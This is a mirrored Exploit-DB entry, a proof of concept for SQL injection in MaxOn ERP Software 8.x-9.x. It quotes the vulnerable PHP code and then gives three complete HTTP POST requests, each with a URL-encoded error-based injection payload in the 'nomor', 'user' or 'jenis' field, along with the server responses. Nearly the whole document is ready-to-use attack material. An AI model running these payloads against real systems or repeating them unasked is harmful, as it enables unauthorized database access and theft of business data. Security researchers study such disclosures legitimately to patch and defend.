bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions 1
exploit-db-mirror/exploits/php/webapps/45605.txt
Offensive Security 731dd0f423 DB: 2018-10-16 
22 changes to exploits/shellcodes

Snes9K 0.0.9z - Buffer Overflow (SEH)

NoMachine < 5.3.27 - Remote Code Execution

MaxOn ERP Software 8.x-9.x - 'nomor' SQL Injection
FLIR Brickstream 3D+ - RTSP Stream Disclosure
FLIR AX8 Thermal Camera 1.32.16 - RTSP Stream Disclosure

CAMALEON CMS 2.4 - Cross-Site Scripting
Academic Timetable Final Build 7.0a-7.0b - 'id' SQL Injection
FLIR AX8 Thermal Camera 1.32.16 - Arbitrary File Disclosure
FLIR Brickstream 3D+ 2.1.742.1842 - Config File Disclosure
Academic Timetable Final Build 7.0b - Cross-Site Request Forgery (Add Admin)
AlchemyCMS 4.1 - Cross-Site Scripting
FLIR AX8 Thermal Camera 1.32.16 - Remote Code Execution
College Notes Management System 1.0 - 'user' SQL Injection
Advanced HRM 1.6 - Remote Code Execution
Centos Web Panel 0.9.8.480 - Multiple Vulnerabilities
Academic Timetable Final Build 7.0 - Information Disclosure
KORA 2.7.0 - 'cid' SQL Injection
2018-10-16 05:01:45 +00:00

118 lines
No EOL
4.4 KiB
Text
Raw Blame History

# Exploit Title: MaxOn ERP Software 8.x-9.x - 'nomor' SQL Injection
# Dork: N/A
# Date: 2018-10-15
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.talagasoft.com
# Software Link: http://demo.maxonerp.com/
# Software Download: https://datapacket.dl.sourceforge.net/project/maxon/maxon.rar
# Version: 8.x-9.x
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# Description
# All users can run sql injection codes.
#
# [PATH]/pos/controllers/User.php Line:350
# [PATH]/application/controllers/User.php Line:414
# function log_activity(){
# $sql="select * from syslog where 1=1";
# $nomor="";$jenis="";$user="";
# if($this->input->post()){
# if($nomor=$this->input->post('nomor')){
# if($nomor!="")$sql.=" and no_bukti='$nomor'";
# }
# if($user=$this->input->post('user')){
# if($user!="")$sql.=" and userid='$user'";
# }
# if($jenis=$this->input->post('jenis')){
# if($jenis!="")$sql.=" and jenis_cmd='$jenis'";
# }
#
# }
# $sql.=" order by tgljam desc limit 1000";
# $data["user"]=$user;
# $data["nomor"]=$nomor;
# $data["jenis"]=$jenis;
#
# $data['syslog']=$this->db->query($sql);
# $this->template->display("log_list",$data);
# }
# POC:
# 1)
# http://TARGET/[PATH]/index.php/user/log_activity
POST /index.php/user/log_activity HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: ci_session=3ba3e8a3b82a8e489cd16703fa5d0d327b84074c
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 253
nomor=%27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58
HTTP/1.1 500 Internal Server Error
Date: Sat, 15 Oct 2018 00:22:45 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Powered-By: PleskLin
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://TARGET/[PATH]/index.php/user/log_activity
POST /index.php/user/log_activity HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: ci_session=3ba3e8a3b82a8e489cd16703fa5d0d327b84074c
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 252
user=%27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58
HTTP/1.1 500 Internal Server Error
Date: Sat, 15 Oct 2018 00:29:02 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Powered-By: PleskLin
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
# POC:
# 3)
# http://TARGET/[PATH]/index.php/user/log_activity
POST /index.php/user/log_activity HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: ci_session=3ba3e8a3b82a8e489cd16703fa5d0d327b84074c
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 253
jenis=%27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58
HTTP/1.1 500 Internal Server Error
Date: Sat, 15 Oct 2018 00:35:52 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Powered-By: PleskLin
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Reference in a new issue View git blame Copy permalink